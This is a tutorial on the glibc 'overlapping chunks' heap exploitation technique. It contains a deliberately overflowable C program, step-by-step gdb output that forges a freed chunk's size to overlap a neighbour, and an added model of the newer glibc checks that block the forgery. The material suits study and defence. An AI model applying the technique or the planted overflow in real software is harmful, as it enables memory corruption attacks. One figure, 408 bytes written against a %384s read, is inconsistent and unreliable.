
Conditions

  • This technique works under the following conditions.
    • The attacker must be able to create a free chunk.
    • The attacker must be able to write a value into the size field of that free chunk.

Exploit plan

  • The attack proceeds as follows.
    • Allocate three heap chunks.
    • Free the second chunk.
    • Write the size to be reallocated into the size field of the free chunk.
      • Size to be reallocated : freed chunk size (0x100 + 0x10) + third chunk size (0x80 + 0x10) + PREV_INUSE (1) = 0x1a1
    • Request a chunk of the desired size.
      • Desired size : 0x1a0 - 8 = 408
      • The allocation returns the start address of the second chunk.
      • As a result, the contents of the third chunk can be overwritten.
  • Because the modified size of the free chunk makes its next chunk point at the top chunk, malloc() does not call unlink().
    • That is, the chunksize(P) != prev_size(next_chunk(P)) check is bypassed.
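The reason the check above is skipped is that the consolidation-time check lives in unlink(), and a free chunk whose forged size runs straight into the top chunk never goes through it. Later glibc releases (2.29 onward) moved an equivalent check into the unsorted-bin path of _int_malloc() itself: before a chunk is handed out, malloc() verifies that the next chunk's prev_size equals the chunk's size and that the next chunk's PREV_INUSE bit is clear. The following program is an added example, not code from this page or from glibc; it models those two checks (plus the size-range checks) over a constructed byte-array snapshot of the heap layout shown in the Debugging section, and shows that the intact freed chunk passes while the forged 0x1a1 size is rejected. ARENA_LEN, SYSTEM_MEM and the arena offsets are assumptions derived from the page's dumps (0x602000 is taken as offset 0); the doubly-linked-list pointer checks are deliberately left out because fd/bk are not modelled.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed snapshot of the page's heap after free(buf2). Offsets are relative
 * to the arena start (0x602000 in the page's gdb dumps). Assumed values. */
#define SIZE_SZ     8UL
#define SIZE_MASK   (~7UL)
#define PREV_INUSE  1UL
#define ARENA_LEN   0x2c0UL    /* covers the three chunks and the top chunk header */
#define SYSTEM_MEM  0x21000UL  /* 0x2b0 + 0x20d50: arena size implied by the top size */

enum check_result {
    CHECK_OK = 0,
    CHECK_INVALID_SIZE,            /* "malloc(): invalid size (unsorted)" */
    CHECK_INVALID_NEXT_SIZE,       /* "malloc(): invalid next size (unsorted)" */
    CHECK_MISMATCH_NEXT_PREV_SIZE, /* "malloc(): mismatching next->prev_size (unsorted)" */
    CHECK_NEXT_PREV_INUSE          /* "malloc(): invalid next->prev_inuse (unsorted)" */
};

static uint64_t rd(const uint8_t *arena, size_t off) {
    uint64_t v;
    memcpy(&v, arena + off, sizeof v);
    return v;
}

static void wr(uint8_t *arena, size_t off, uint64_t v) {
    memcpy(arena + off, &v, sizeof v);
}

/* Validate a free chunk at offset `victim` the way glibc 2.29+ does before
 * returning it from the unsorted bin. Returns the first failing check. */
enum check_result check_unsorted_victim(const uint8_t *arena, size_t victim) {
    uint64_t size = rd(arena, victim + 8) & SIZE_MASK;
    if (size <= 2 * SIZE_SZ || size > SYSTEM_MEM)
        return CHECK_INVALID_SIZE;

    size_t next = victim + size;
    if (next + 16 > ARENA_LEN)           /* bound of our snapshot, not a glibc check */
        return CHECK_INVALID_NEXT_SIZE;

    uint64_t next_size_raw = rd(arena, next + 8);
    uint64_t next_size = next_size_raw & SIZE_MASK;
    if (next_size < 2 * SIZE_SZ || next_size > SYSTEM_MEM)
        return CHECK_INVALID_NEXT_SIZE;

    if (rd(arena, next) != size)         /* next->prev_size must mirror our size */
        return CHECK_MISMATCH_NEXT_PREV_SIZE;

    if (next_size_raw & PREV_INUSE)      /* successor of a free chunk must see it as free */
        return CHECK_NEXT_PREV_INUSE;

    return CHECK_OK;
}

/* Layout from the page after free(buf2): buf1 0x110, buf2 0x110 (free), buf3 0x90, top. */
void build_page_arena(uint8_t *arena) {
    memset(arena, 0, ARENA_LEN);
    wr(arena, 0x000, 0);     wr(arena, 0x008, 0x111);   /* buf1, in use */
    wr(arena, 0x110, 0);     wr(arena, 0x118, 0x111);   /* buf2, in the unsorted bin */
    wr(arena, 0x220, 0x110); wr(arena, 0x228, 0x90);    /* buf3: prev_size 0x110, PREV_INUSE clear */
    wr(arena, 0x2b0, 0);     wr(arena, 0x2b8, 0x20d51); /* top chunk */
}

/* The freed chunk as left by free(): every check passes. */
enum check_result check_intact(void) {
    uint8_t arena[ARENA_LEN];
    build_page_arena(arena);
    return check_unsorted_victim(arena, 0x110);
}

/* The same chunk after its size field is overwritten with 0x1a1 as on the page:
 * next lands on the top chunk, whose prev_size is 0, so the mismatch check fires. */
enum check_result check_forged(void) {
    uint8_t arena[ARENA_LEN];
    build_page_arena(arena);
    wr(arena, 0x118, 0x1a1);
    return check_unsorted_victim(arena, 0x110);
}

int main(void) {
    printf("intact free chunk : %d (0 = accepted)\n", check_intact());
    printf("size forged 0x1a1 : %d (3 = next->prev_size mismatch)\n", check_forged());
    return 0;
}
```

The same forged chunk would also trip the PREV_INUSE check if the prev_size check were absent, since the top chunk's size word (0x20d51) still has its low bit set; a consistent free chunk of size 0x1a0 at 0x602110 would require the top chunk to report prev_size 0x1a0 and PREV_INUSE clear, neither of which the overflow produces.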

Example

Source code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

int main(void){

	/* Three adjacent chunks: 0x110, 0x110 and 0x90 bytes including headers. */
	char *buf1 = malloc(0x100);
	char *buf2 = malloc(0x100);
	char *buf3 = malloc(0x80);

	memset(buf1, 'A', 0x100);
	memset(buf2, 'B', 0x100);
	memset(buf3, 'C', 0x80);

	/* buf2 goes to the unsorted bin; its header sits right after buf1's data. */
	free(buf2);

	int size;

	/* 272 bytes into a 256-byte buffer: the overflow reaches buf2's prev_size and size fields. */
	scanf("%272s",buf1);
	scanf("%d",&size);

	/* Attacker-chosen size; with the forged header this returns buf2's old address. */
	char *buf4 = malloc(size);

	/* Writing through buf4 runs past buf3's header into buf3 itself. */
	scanf("%384s",buf4);
	printf("buf3 : %s\n",buf3);

	scanf("%128s",buf3);
	printf("buf4 : %s\n", buf4);

	return 0;
}

Exploit flow

Overlapping chunks

Debugging

  • Set breakpoints as follows.
    • 0x4006f8 : call to free(buf2)
    • 0x400713 : after the call to scanf("%272s",buf1)
    • 0x400736 : after the call to malloc(size)
    • 0x400750 : after the call to scanf("%384s",buf4)
    • 0x40077c : after the call to scanf("%128s",buf3)

Break points
gdb-peda$ b *0x00000000004006f8
Breakpoint 1 at 0x4006f8
gdb-peda$ b *0x0000000000400713
Breakpoint 2 at 0x400713
gdb-peda$ b *0x0000000000400736
Breakpoint 3 at 0x400736
gdb-peda$ b *0x0000000000400750
Breakpoint 4 at 0x400750
gdb-peda$ b *0x000000000040077c
Breakpoint 5 at 0x40077c
gdb-peda$ 
gdb-peda$ r
Starting program: /home/autolycos/Documents/def/overlapping_chunks 
  • The heap chunks are allocated as follows.
    • 0x602010 : 0x100 bytes of 'A'
    • 0x602120 : 0x100 bytes of 'B'
    • 0x602230 : 0x80 bytes of 'C'
free(buf2)
Breakpoint 1, 0x00000000004006f8 in main ()
gdb-peda$ x/90gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000111
0x602010:	0x4141414141414141	0x4141414141414141
...
0x602100:	0x4141414141414141	0x4141414141414141
0x602110:	0x0000000000000000	0x0000000000000111
0x602120:	0x4242424242424242	0x4242424242424242
...
0x602210:	0x4242424242424242	0x4242424242424242
0x602220:	0x0000000000000000	0x0000000000000091
0x602230:	0x4343434343434343	0x4343434343434343
...
0x6022a0:	0x4343434343434343	0x4343434343434343
0x6022b0:	0x0000000000000000	0x0000000000020d51
0x6022c0:	0x0000000000000000	0x0000000000000000
gdb-peda$ ni
0x00000000004006fd in main ()
gdb-peda$ x/90gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000111
0x602010:	0x4141414141414141	0x4141414141414141
...
0x602100:	0x4141414141414141	0x4141414141414141
0x602110:	0x0000000000000000	0x0000000000000111
0x602120:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x602130:	0x4242424242424242	0x4242424242424242
...
0x602210:	0x4242424242424242	0x4242424242424242
0x602220:	0x0000000000000110	0x0000000000000090
0x602230:	0x4343434343434343	0x4343434343434343
...
0x6022a0:	0x4343434343434343	0x4343434343434343
0x6022b0:	0x0000000000000000	0x0000000000020d51
0x6022c0:	0x0000000000000000	0x0000000000000000
gdb-peda$
  • The size field of the free chunk can be overwritten as follows.
    • 256 'A's : buf1 area
    • 8 'B's : prev_size field of the free chunk
    • 8 'C's : size field of the free chunk
  • The following value is stored in the size field of the free chunk.
    • 0x110 (buf2 size) + 0x90 (buf3 size) + 0x1 (PREV_INUSE) = 0x1A1
Overwrite the size field of the free chunk with 0x1a1
gdb-peda$ c
Continuing.

gdb-peda$ c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBCCCCCCCC
Breakpoint 2, 0x0000000000400713 in main ()
gdb-peda$ x/90gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000111
0x602010:	0x4141414141414141	0x4141414141414141
...
0x602100:	0x4141414141414141	0x4141414141414141
0x602110:	0x4242424242424242	0x4343434343434343
0x602120:	0x00007ffff7dd3700	0x00007ffff7dd37b8
0x602130:	0x4242424242424242	0x4242424242424242
...
0x602210:	0x4242424242424242	0x4242424242424242
0x602220:	0x0000000000000110	0x0000000000000090
0x602230:	0x4343434343434343	0x4343434343434343
...
0x6022a0:	0x4343434343434343	0x4343434343434343
0x6022b0:	0x0000000000000000	0x0000000000020d51
0x6022c0:	0x0000000000000000	0x0000000000000000
gdb-peda$
gdb-peda$ set *0x602118 = 0x1A1
gdb-peda$ set *0x60211c = 0x0
gdb-peda$ x/gx 0x602118
0x602118:	0x00000000000001a1
gdb-peda$
  • A heap chunk is allocated as follows.
    • Size of the chunk to request : 0x1a0 - 8 = 0x198 (408)
    • Address of the allocated chunk : 0x602120
    • That is, the newly allocated chunk can be used to overwrite the buf3 area.
malloc(408)
gdb-peda$ c
Continuing.
408

Breakpoint 3, 0x0000000000400736 in main ()
gdb-peda$ i r rax
rax            0x602120	0x602120
gdb-peda$ x/54gx 0x602120 - 0x10
0x602110:	0x4242424242424242	0x00000000000001a1
0x602120:	0x00007ffff7dd3700	0x00007ffff7dd37b8
0x602130:	0x4242424242424242	0x4242424242424242
...
0x602210:	0x4242424242424242	0x4242424242424242
0x602220:	0x0000000000000110	0x0000000000000090
0x602230:	0x4343434343434343	0x4343434343434343
...
0x6022a0:	0x4343434343434343	0x4343434343434343
0x6022b0:	0x0000000000000000	0x0000000000020d51
gdb-peda$

  • The contents of buf3 can be changed through the buf4 area as follows.
    • 408 'D's are stored in the buf4 area.
scanf("%384s",buf4)
gdb-peda$ c
Continuing.
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
Breakpoint 4, 0x0000000000400750 in main ()
gdb-peda$ x/90gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000111
0x602010:	0x4141414141414141	0x4141414141414141
...
0x602100:	0x4141414141414141	0x4141414141414141
0x602110:	0x4242424242424242	0x00000000000001a1
0x602120:	0x4444444444444444	0x4444444444444444
0x602130:	0x4444444444444444	0x4444444444444444
0x602140:	0x4444444444444444	0x4444444444444444
0x602150:	0x4444444444444444	0x4444444444444444
0x602160:	0x4444444444444444	0x4444444444444444
0x602170:	0x4444444444444444	0x4444444444444444
0x602180:	0x4444444444444444	0x4444444444444444
0x602190:	0x4444444444444444	0x4444444444444444
0x6021a0:	0x4444444444444444	0x4444444444444444
0x6021b0:	0x4444444444444444	0x4444444444444444
0x6021c0:	0x4444444444444444	0x4444444444444444
0x6021d0:	0x4444444444444444	0x4444444444444444
0x6021e0:	0x4444444444444444	0x4444444444444444
0x6021f0:	0x4444444444444444	0x4444444444444444
0x602200:	0x4444444444444444	0x4444444444444444
0x602210:	0x4444444444444444	0x4444444444444444
0x602220:	0x4444444444444444	0x4444444444444444
0x602230:	0x4444444444444444	0x4444444444444444
0x602240:	0x4444444444444444	0x4444444444444444
0x602250:	0x4444444444444444	0x4444444444444444
0x602260:	0x4444444444444444	0x4444444444444444
0x602270:	0x4444444444444444	0x4444444444444444
0x602280:	0x4444444444444444	0x4444444444444444
0x602290:	0x4444444444444444	0x4444444444444444
0x6022a0:	0x4444444444444444	0x4444444444444444
0x6022b0:	0x4444444444444444	0x0000000000020d00
0x6022c0:	0x0000000000000000	0x0000000000000000

gdb-peda$ c
Continuing.
buf3 : DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
